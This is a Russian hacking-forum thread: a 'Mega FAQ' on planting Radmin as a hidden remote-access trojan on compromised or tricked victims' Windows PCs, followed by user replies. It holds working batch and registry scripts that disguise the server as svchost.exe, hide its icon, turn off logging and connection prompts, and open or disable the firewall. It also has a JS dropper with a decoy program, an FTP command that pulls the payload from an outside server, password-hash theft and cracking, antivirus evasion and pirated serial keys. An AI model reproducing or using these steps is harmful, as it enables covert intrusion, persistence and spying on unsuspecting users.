Mega FAQ по Radmin'у

Intro

Помниться, летом уже прошедшего года, появилось вполне здоровое желание потренироваться в области троян-хака и возыметь определенную власть в местной локалке. Начились раскопки тырнета на предмет осваивания современных троев. (Кстати, кто там искал пинча? http://dkcs.void.ru/index.php?module=soft&page=troyans) . Именно тогда я заинтересовался радмином, а чуть позже узнал, что наш администратор именно с его помощью помогает бедным юзверям в их лам-делах. Какое совпадение =]

Как раз имено в то время в интернете начали появляться мануалы по установке\взлому радмина.
Просмотрев всё, что выплюнуло три поисковика, удалось собрать недетский хелп http://sec-123.narod.ru/radmin/1.rar

Запомните, порой всё что вам надо, делает сам разработчик. Я не раз убеждался в этом.
Поэтому READ THE FACKING MANUAL, мля !!! Где я и нашел практически всё, что нужно.
Дополнительная инфа из поисковиков добавило кучу вкусностей к пресному ману разработчика.

Почему именно Радмин?

1. Есть телнет, файловый менеджер, наблюдение и контроль за раб.столом, вкл\выкл компа.
2. Не палиться Касперским. НО УЧТИТЕ, что НОД его палит!!!
3. Возможность скрытой установки из консоли и малая палевность в системе.
4. Вобщем-то малый обём(не пинч конечно, но пайдёт)
5. Подержка прокси соединения на аналогичный радмин сервер(если ломать чужой радмин сервер).

Мы будем рассматривать версии от 2.0 до 2.2; они впринципе идентичные. Проги сами найдёте.
Привожу скучные коменты:

2.0
Serial_key: 08le-2jg4MggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhysVBux8HE7udeSR0D1E0

2.1
Serial_key: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

2.2
Serial_key: 08mi6OFGZ7xOssk3ECduXquHrrfBQksiZK0BHfuF17GAXvJybPiTRTCm7tsnRkyGTs-VSDTEzQjAe7BtlsguDiq1

Радмин контролирует правильность и безопасность настройки серверной части программы. Radmin Server 2.2 не позволяет задать пустой пароль.
Интеллекуальная защита от подбора пароля и DoS-атак. В версии 2.2 добавлены такие меры защиты, как анти-хакерская задержка, блокирование подозрительных IP-адресов, и т. д

3.0
Текстовый чат
Голосовой чат

По поводу совметимости версий - главное, чтобы клиент(вы с него конектитесь) был не старее сервера(его вы имеете =] ).
В качестве клиента советую юзать 3-ю версию(есть сканер порта+иконки типа файла в фаловом менеджере, имхо вери удобно).
Я использую по сей день 2.0 сервак. Просто переделывать всё, что забацал на нём под другие версии просто влом =]

Все операции приведны для 2.0 сервера.
===============Скрытая Установка==================
+++++Введение++++++
Допустим, вы хакнули систему сплоитом(MS09-039_RPC-3, ms04-011, и др.) и смотрите на консоль с правами System.
Загрузим и запустим ниже рассмотренные файлы.

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)

Между прочим, если просто стартануть сервак без всякой установки, он заработает!!! Вход без пароля.
Однако, тут же палит себя в трее. Чтобы этого не случилось, необходимо прописаться в реестре

Вот список ключей в реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - пкть к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзверя разрешение на взлом =]

Сам же сервер автогрузиться как служба.

+++++Настройки скриптов.+++++
Самый кайф в том, что сервак может запускаться из ЛЮБОГО места (хоть из C:\RECYCLER), лишь бы там же были AdmDll.dll и raddrv.dll.
И назвать его можно как угодно. Переименуем r_server.exe в svchost.exe .

Путём проб и ошибок были составлены следующие скриптики: http://sec-123.narod.ru/radmin/4.rar

111.bat - автозапуск всего безобразия.
Сначала в правила встроенного в ХР фаервола добавляеться новое правило.
Затем извлекаються все записи из реестра в 123.reg про Радмин, если он был уже установлен.
Происходит автокопирование в системную папку(например, C:\Windows\).
Установки радмина обновляються на ваши(два варианта под 2000 и ХР)
Установка и запуск сервера.

Code:

@echo off 
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete  "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]

Code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
  18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
  1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

===================№3 Взлом Сервера Радмина==================
Раскажу про способы.

++++Доступ к реестру++++
У многих компов разрешен доступ на чтение реестра!
Юзать надо так через командную строку.
Для хелпа наберите
reg /? - для ХР
regedit /? - для 2000

REG COPY \\ZODIAC\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Копирует все параметры раздела RAdmin с компьютера ZODIAC
в раздел HKLM\Software\Hacker на локальном компьютере.

Затем лезем к себе в реестр и копируем значение в *.txt файл.
HKLM\Software\Hacker\v2.0\Server\Parameters]
"Parameter"=??????????????????????????????????

Берем PasswordPRO, скармливаем ей наш txt-файл с паролем, выбирая алгоритм RADMIN, и ждём результата.

Кстати, если изменить пароль в реестре, изменение подействует без всяких перезагрузок сервера радмина.
И при следующем коннекте он будет уже действителен. Текущая сессия не прервётся при смене пароля.

+++++Подбор пароля++++
В инете мне попадалось на глаза всего два публичных радмин-брута.
Первый был на народе, но мне не посчастливилось его скачать - сайт прикрыли.
Есть второй вариант, по хуже, на зато рабочий. Выполнен на *.vbs скрипте.
Скорость фиговая, но для автоматизации перебора по словарю годиться.
Помните, что в 2.2 версии есть защитные механизмы от брута...
http://sec-123.narod.ru/radmin/2.rar

+++++Впаривание Радмина++++
Самый лучший способ - взять выше выложенные скрипты, оформить инструкции,
упаковать инсталлером с какой-нить прогой и впарить ламеру.

Вот, как это сделать без инсталлера.
Можно невидимо пустить bat-файл через ява-скрипт:
_README.js

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);

Запуститься сначала установка радмина, а за ней какая-нить типа полезная прога.
http://sec-123.narod.ru/radmin/6.rar

+++++Как не спалиться++++
Если вы подобрали пароль на уже установленный радмин, советую заменить r_server.exe на пропатченную версию.
Дело в том, что иконка в трее при отсутствии соединений СИНЯЯ, а при наличии таковых - КРАСНАЯ.
Достаточно каким-либо редактором иконок поменять Красную на Синюю... http://sec-123.narod.ru/radmin/5.rar
Учтите, иногда перезапуск сервиса радмина возможен только после перезагрузки системы. Такой вот глюк.
Также, убедитесь в отсутствии логирования в реестре(см. выше).
Для конспирации при впаривании можно зашифровать батник, или сконвертировать его в *.com (http://sec-123.narod.ru/radmin/3.rar)

================================================

Ничего не забыл?...

 

Кстати, совсем недавно, в выпуске Мазафаки под новый год была вот эта статья, написанная eXp.l0ziv.

Привожу её содержание. Важным достоинством считаю выполнение опереций с реестром без переходного рег-файла, напрямую из командной строки. Учтите, некоторые фичи работают лишь для радмина выше 2.1.

0х01. Интро
-----------

Последнее время участились просьбы на форумах о помощи закрепиться на Windows-машинах, да и в ICQ почему-то спрашивают вопросы именно такого рода...и именно про RAdmin. Поэтому, чтобы не обьяснять каждому что к чему, я решил об этом написать...
Итак... Совершенно не важно как вы получили доступ к машине с ОС Windows (локально или удалённым сплойтом), важно что у вас есть потребность в последующем использовать ресурсы и/или данные этой машины. Способов оставить себе лазейку множество... от бинда порта до установки троянов. Один из многих - это установка RAdmin. Приступим.

0х02. Теория
------------

Да-да... именно теория, так как выяснилось что многие люди незнают коммандной оболочки и что такое *.bat-файлы. Из данной области надо хотя бы знать как пользоваться FTP через cmd.exe =) Придумывать ничего не надо, вот хэлп:

Синтаксис:

ftp [-v] [-d] [-i] [-n] [-g] [-s:имя_файла] [-a] [-w:размер] [-A] [Ведомый компьютер]

... из параметров нам понадобится только:

-v = Запрещает вывод на экран ответа FTP-сервера;
-n = Запрещает автоматический вход в систему в ходе начального подключения;
-s:имя_файла = Указывает текстовый файл с ftp-командами.
Эти команды выполняются автоматически после запуска команды ftp. ;

Также советую почитать справку по коммандам - REG ADD, netsh firewall, net stop/start, чтобы хотябы понимать, что мы будем делать далее...

0х03. Процесс установки
-----------------------

Пользоваться будем RAdmin'ом 2.1 Из все кучи файлов нам нужны только:
r_server.exe, AdmDll.dll, raddrv.dll. Вот что написано в хэлпе:

Usage: r_server.exe options

Options:

/setup - show window dialog box with setup settings (install,remove,port,pass)
/pass:xxxxx - specify a password
/port:xxxxx - specify a port number
/install - install service (Win95/98 or WinNT) and driver (WinNT)
/uninstall - uninstall service and driver, if present
/save - save pass & port to the defau lt program settings in the registry if you not
specify port or\and pass when use this option, default port or\and empty
password will be saved.
/silence - dont show message boxes,in /install, /uninstall or /save commands.
/unregister - delete an already entered key for Radmin.
/? - this help screen

Note, that port and password specified in the command prompt,
always overrides default settings from the registry.

Отсюда видно, что для установки RAdmin'a в коммандной строке необходимо набрать:

CMD>r_server.exe /install /silence
CMD>r_server.exe /port:порт /pass:пароль /save /silence

Всё... RAdmin установлен и его можно использовать. НО! На данном этапе он слишком заметен
из-за иконки в трэе. Для того чтобы её убрать необходимо добавить в реестр несколько
ключей:

В [HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters] - ключ "DisableTrayIcon", тип - REG_BINARY,
значение - 00000001.
В [HKLM\SYSTEM\CurrentControlSet\Services\r_server] - ключ "DisplayName", тип - REG_SZ,
значение - "Service Host Controller".

Сделать это можно коммандами:

CMD>REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

0х04. Автоматизация
-------------------

Всё это, конечно, хорошо, но занимает некоторое время. Поэтому было бы неплохо,
сократить количество действий. Для этого напишем *.bat-файл примерно такого содержания:

@echo off
echo open [Adress_FTP]>ra.pif // [Adress_FTP] - адресс FTP-сервера
echo [user] [pass] a>>ra.pif // [user] - логин, [pass] - пароль
echo binary>>ra.pif
echo GET AdmDll.dll [Path]\AdmDll.dll>>ra.pif //
echo GET raddrv.dll [Path]\raddrv.dll>>ra.pif // [Path] - путь к файлам
echo GET r_server.exe [Path]\r_server.exe>>ra.pif //
echo bye>>ra.pif
ftp -v -n -s:ra.pif
c:\windows\r_server.exe /install /silence
c:\windows\r_server.exe /pass:123 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
c:\windows\r_server.exe /stop
c:\windows\r_server.exe /start

0х05. Утилизация файрвола
-------------------------

Часто бывает так, что на машине включён фаерволл (пусть даже стандартный) и он нам мешает. В случае с Windows у нас есть 2 пути: отключть его либо добавить необходимые правила. Рассмотрим каждый из них в отдельности.
Итак, как же отключить стандартный фаерволл? В ОС Windows фаерволом является - служба "Брандмауэр Windows/Общий доступ к Интернету (ICS)" или по-простому - sharedaccess.
Останавливается он командой:

CMD>NET STOP "Брандмауэр Windows/Общий доступ к Интернету (ICS)"
либо
CMD>NET STOP sharedaccess

но тут есть свои нюансы... при попытке отключения этой службы - пользователь получит сообщение с предупреждением о небезопасности этого действия. Это неприемлемо! Следовательно нужно сделать так чтобы этого не произошло. За выдачу таких сообщений отвечает служба "Центр обеспечения безопасности" (по-простому - wscsvc). С ледовательно перед отключением фаера, необходимо отключить эту службу одной из двух комманд:

CMD>NET STOP "Центр обеспечения безопасности"
либо
CMD>NET STOP wscsvc

Теперь перейдём к более элегантному методу - добавлению необходимого правила для фаера. В Win XP SP2 модифицировать и добавлять правила можно коммандой netsh firewall. Вот небольшая справка:
Группа
Команда
Описание

Добавление конфигурации
netsh firewall add allowedprogram
netsh firewall add portopening Добавление разрешенной программы в брандмауэр Windows. Добавление конфигурации порта в
брандмауэр Windows

Удаление
netsh firewall delete allowedprogram
netsh firewall delete portopening Удаление разрешенной конфигурации
программы из брандмауэра Windows
Удаление конфигурации порта из
брандмауэра Windows

добавить правило можно одной коммандой:

CMD>netsh firewall add allowedprogram C:\Progra~1\Radmin\r_server.exe systerm enable
либо
CMD>netsh firewall add portopening TCP 4899 systerm
где systerm - просто назване правила.

Если же на машине установлен не SP2, то придётся поработать добавляя нужные ключи к реестру уже знакомой коммандой REG ADD.

Каким бы способом вы не отключали брандмауэр - удобнее дописать все необходимые комманды в уже созданый в *.bat-файл...

0х06. Ауттро
------------

Несмотря на лёгкость и элегантность этого метода, у него всё же есть несколько минусов, а именно:

- открытый порт 4899. Спрятать средствами RAdmin'a его нельзя. Можно только поменять, добавив при установке ключ /port:[порт];
- Добавляется новый сервис (служба);
- Добавляются записи в реестр;
- Заметен для антивирусов;
- Светиться в процессах. Устраняется путём переименовывания exe-шника во что-нибуть неприметное,
например - svhost.exe =)
- некоторые комманды доступны только в WinXP SP2.

0х07. Ссылки
------------

- http://www.cyberlords.net - Оригинал статьи
- http://www.cyberlords.net/... - сканер радмин серверов с пустым паролем
- http://www.blacklogic.net/ - Анализ системы удаленного контроля NTRootKit, E-Zine FH0, 0x01
- http://www.famatech.com/support/faq.php - FAQ, офф-сайт RAdmin'a
- http://www.radmin.com - офф-сайт RAdmin'a
- http://www.rootkit.com
- http://www.ucl.ac.uk/cert/win_intrusion.pdf
- http://www1.umn.edu/oit/img/assets/5630/WindowsRootkits.pdf - презентация с конференции Defcon
- http://www.windowsecurity.com/artic...d_Rootkit_Tools_in_a_Windows_Environment.html

Автор: eXp.l0ziv

 

Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы. Вот криптованый радмин v2.0 ). Не палиться Нодом Nod32 2.50.25 с базами от 10-го февраля. Касперский со стандартными базами не реагирует, с расширенными палит.

В процессе выяснилось - Нод спотыкается о древнейшие грабли 2002 года, на которые попадался Касперский. При смене точки начала загрузки (прога topo12.exe) трояна - Нод перестаёт его видеть =]

 

Спасибо, теперь плохие дяди будут жить плохо... Как и положено.
+ к репе.

 

Молодец хорошее Faq!

 

Согласен, информативно. Теперь будет ссылка что надо даваь при вопросах "че такое радмин икак его использовать"

 

Radmin - это тема!!!
Скину своему преподу по проге...

 

МегаРеспект за МегаСтатью =), +

 

Elect молодец.

 

Отлично

 

Даешь RAdmin! =)
У меня вопрос... Я смотрел видео от Elekt, тама в XSpider профилях есть DefaultOff у меня такого нету, есть Default, но тогда пишет
Сканирование хоста не производилось, так как хост не отвечает на ICMP запросы. Чтобы выполнить сканирование необходимо выбрать соответствующий профиль (например: "DefaultOff.prf").
И чё мне делать? =(

 

Сменить профиль сканирования. На всякий случай вот несколько хороших доработанных профилей. Их в более старших версиях разработчики просто убрали, типа защита от дурака.

http://sec-123.narod.ru/Profiles.rar
http://rapidshare.de/files/14864179/Profiles.rar.html

 

Ага... Пасибо!

Не понимаю... Просканировал 75 IP адресов, и ничего, неужели у всех файрволл?! Или я что-то не то сканирую... 445 / tcp - Это?

 

Вопрос по радмину:есть лок машина доступ туда есть полный , как шары, так телнет , ну в общем что угодно, кроме физического доступа!
Как удобнее сделать так чтобы можно было закидывать радмина под svchost.exe запускать его удаленно так чтобы он не жил в трее, работать через внешние айпи с этой машины(машина эта имеет реал айпи) далее после завершения работы из внешних айпи, закрывать радмина !
Как это проще сделать ? через телнет я смогу запустить радмина, и добавить ключи а реест , которые вынесут его из трея?

Ещё вопрос сможет ли радмин вырубить самого себя, если я подрубаюсь на raserver.exe и запускаю cmd kskill raserver.exe !
Сможет ли радмин снять самого себя, или выполнить эту cmd команду?

Т.е. ,если я удаленно с внешнего IP подрубаюсь на IP с радмином, работаю , а потом снимаю из процессов радмина сервера, снимаю с самого радмина?
Получиться ли так?


через tskill r_server не получается, получается снять с 3-х кнопок, но если подключаться через телнет с удаленно IP , то 3 кнопки не катируются
как можно его вынести?

 

Про запуск из телнета и скрытие из трея читай выше.

Если б ты удосужился скачать вот ЭТОТ архивчик, то обнаружил в нём DEL.bat . Кажется я его оставлял там при архивации.

Поясню, вырубить радмин можно двумя способами.

Способ_1. Цивилизованный.
Радмин предусматривает остановку своего сервиса командой:

Code:

C:\Windows\r_server.exe /stop

Способ_2. Универсальный.
Дёшево и сердито.

Code:

taskkill /IM r_server.exe /F /T

или предварительно посмотрев PID радмина командой

Code:

tasklist

например, пид равен 1234, тогда пишем

Code:

taskkill /PID 1234 /F /T

Если ты это делаешь из под консоли радмина - связь должна характерно отрубиться =]

 

Elektтопик давно, скачал, но проблема в том, что радмина закинул, допусим внес изменения в реестр, но веть для того чтобы он заработал нужно ресет машины, или же ресет выполняется только после первого заселения?
Если заселять только
AdmDll.dll
raddrv.dll
svchost.exe
Запустив svchost.exe , он будет запущен от имени учетной записи, как его снять понял , спасибо за подсказку!

 

А мне скажите кто-нибудь =*( Какой порт надо сканировать? 445 / tcp?

Ладно... На тупые вопросы не отвечаете

 

Ponchik помоему радмину всё равно на каком порту висеть главное выше 5001 и ниже 10000 и чтобы порт был не занят ничем, может я ошибаюсь, исправьте тогда!

 

Полезные ссылки по сабжу:

Как выключить монитор через командную строку

Взлом протокола Радмина. Помогаем автору

Нужэн брут под radmin

Ставим radmin через win shell

Борьба с админом, а точнее с R_admin

=================================
Лучше бы закрыть тему.

 

Подскажите, пожалуйста, что надо добавить в рег файл, что бы радмин запускался при загрузки винда.